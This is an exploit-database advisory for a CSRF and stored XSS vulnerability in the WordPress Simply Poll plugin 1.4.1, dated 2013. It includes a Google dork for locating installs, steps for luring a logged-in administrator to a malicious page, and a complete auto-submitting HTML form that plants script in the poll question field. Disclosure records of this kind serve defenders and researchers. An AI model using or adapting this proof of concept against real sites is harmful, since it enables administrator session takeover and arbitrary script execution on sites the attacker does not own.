WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS

vendor:

Simply Poll Plugin

by:

m3tamantra

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS)

352, 79

CWE

Product Name: Simply Poll Plugin

Affected Version From: 1.4.1

Affected Version To: 1.4.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:simply_poll_plugin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)

2013

WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS

The WordPress Simply Poll Plugin 1.4.1 is vulnerable to Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS). The question parameter is vulnerable to XSS and the plugin has an CSRF vulnerability (Polls=>Add New). The PoC leads to arbitrary javascript execution in back-end area. An attacker can exploit this vulnerability by sending a link (pointing to the PoC html file) to a logged in admin. When the admin views the Polls the javascript Code will execute.

Mitigation:

Update to the latest version of the plugin and ensure that all users are using strong passwords.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS
# Google Dork: inurl:"/wp-content/plugins/simply-poll
# Date: 16.03.2013
# Exploit Author: m3tamantra
# Vendor Homepage: http://wordpress.org/extend/plugins/simply-poll/
# Software Link: http://downloads.wordpress.org/plugin/simply-poll.1.4.1.zip
# Version: 1.4.1
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)

Note: After a email to plugins@wordpress.org, "Simply Poll Plugin" was deleted.

Description:
- The question parameter is vulnerable to XSS
- Simply Poll has an CSRF vulnerability (Polls=>Add New) 

The PoC leads to arbitrary javascript execution in back-end area.

Steps to exploit the Flaw:
- Save PoC code in html file
- Send a link (pointing to the PoC html file) to a logged in admin
- When Admin view the Page he will automatically add a new Poll which exploits an XSS vulnerability in the question parameter
- When the admin views the Polls the javascript Code will execute

Note: this was just an example, it is also possible to remove, reset and edit all Polls.

[code]
<html>
<head>
<title>Simply Poll CSRF and XSS</title>
</head>
<body>
<!-- replace "127.0.0.1:9001/wordpress" -->
<form action="http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=sp-add" method="post">
<input type="hidden" name="question" value='Is CSRF+XSS possible?<script>alert(1)</script>' />
<input type="hidden" name="answers[1][answer]" value="yes" />
<input type="hidden" name="answers[2][answer]" value="no" />
<input type="hidden" name="answers[3][answer]" value="maybe" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[5][answer]" value="" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[6][answer]" value="" />
<input type="hidden" name="answers[7][answer]" value="" />
<input type="hidden" name="answers[8][answer]" value="" />
<input type="hidden" name="answers[9][answer]" value="" />
<input type="hidden" name="answers[10][answer]" value="" />
<input type="hidden" name="polledit" value="new" />
</form>
<script>document.forms[0].submit();</script>

</body>
</html>
[/code]